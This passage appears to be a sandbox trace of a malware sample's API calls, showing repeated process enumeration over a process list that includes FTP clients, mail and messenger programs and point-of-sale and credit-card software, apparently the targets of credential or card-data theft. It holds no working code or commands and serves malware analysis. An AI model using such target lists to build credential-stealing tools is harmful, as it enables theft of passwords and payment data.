dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0210.672] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0210.674] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0210.677] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0210.860] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0210.863] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0210.865] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0210.868] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0210.870] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0210.873] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0210.876] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0210.879] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0210.902] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0210.906] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0210.909] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0210.912] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0210.914] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0210.916] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0210.920] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0210.923] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0210.925] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0210.928] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0210.930] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0210.933] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0210.935] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0210.943] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0210.945] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0210.948] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0210.950] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0210.953] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0210.955] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0210.957] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0210.960] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0210.963] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0210.965] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0210.968] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0210.971] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0210.974] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0210.976] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0210.982] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0210.984] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0210.986] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0210.988] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0210.990] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0210.992] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0210.994] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0210.996] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0210.998] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0211.000] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0211.002] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0211.004] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0211.006] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0211.008] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0211.010] CloseHandle (hObject=0x20fc) returned 1 [0211.010] Sleep (dwMilliseconds=0x64) [0211.115] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2108 [0211.130] Process32First (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0211.133] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0211.135] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0211.137] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0211.139] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0211.141] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0211.143] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0211.145] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0211.147] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0211.176] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.196] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.199] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0211.202] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.204] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.207] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.210] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.212] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.215] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.218] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.221] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0211.223] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0211.228] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0211.238] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0211.241] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.243] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0211.292] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0211.295] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0211.297] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0211.299] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0211.301] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0211.304] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.306] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, 